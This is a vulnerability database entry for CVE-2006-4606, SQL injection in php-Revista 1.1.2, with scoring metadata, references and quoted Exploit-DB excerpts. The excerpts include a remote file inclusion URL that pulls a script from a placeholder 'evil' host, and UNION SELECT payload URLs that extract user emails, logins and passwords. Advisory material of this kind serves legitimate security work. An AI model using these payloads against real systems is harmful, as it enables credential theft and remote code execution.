CVE-2006-4606
Published 2006-09-07
CVE-2006-4606: Multiple SQL injection vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to execute arbitrary SQL commands via the (1) id_temas…
Priority: P3 | 42 | high | CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 2.37% (81.7th percentile)
Multiple SQL injection vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to execute arbitrary SQL commands via the (1) id_temas parameter in busqueda_tema.php, the (2) cadena parameter in busqueda.php, the (3) id_autor parameter in autor.php, the (4) email parameter in lista.php, and the (5) id_articulo parameter in articulo.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| longino | jacome_php-revista | — | — |
No detection rules found.
Exploit-DB
PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
exploitdb·2009-04-14
CVE-2006-4608 PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting
---
Discovered by Sirdarckcat from elhacker.net
Revista 1.1.2
http://php-revista.sourceforge.org
Revista is a simple Spanish PHP magazine editor.
It was done by php.org.mx.
It suffers from multiple vulnerabilities.
Remote File Inclusion
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script
SQLi
http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]
http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]
http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]
http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]
Credentials Bypass
http://revista/admin/index
Exploit-DB
PHP-revista 1.1.2 - Multiple SQL Injections
exploitdb·2007-03-21
CVE-2006-4606 PHP-revista 1.1.2 - Multiple SQL Injections
---
php-revista <= 1.1.2 Remote SQL Injection Exploit
Found by & contact : Cold z3ro , [email protected]
script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0
Exploits :
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
Ht
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/21738
- http://securityreason.com/securityalert/1499
- http://www.attrition.org/pipermail/vim/2009-April/002167.html
- http://www.osvdb.org/28445
- http://www.osvdb.org/28446
- http://www.osvdb.org/28447
- http://www.osvdb.org/28448
- http://www.osvdb.org/28451
- http://www.osvdb.org/28452
- http://www.securityfocus.com/archive/1/445007/100/0/threaded
- http://www.securityfocus.com/archive/1/502637/100/0/threaded
- http://www.securityfocus.com/bid/19818
- http://www.securityfocus.com/bid/23079
- https://www.exploit-db.com/exploits/3538
- https://www.exploit-db.com/exploits/8425
Published: 2006-09-07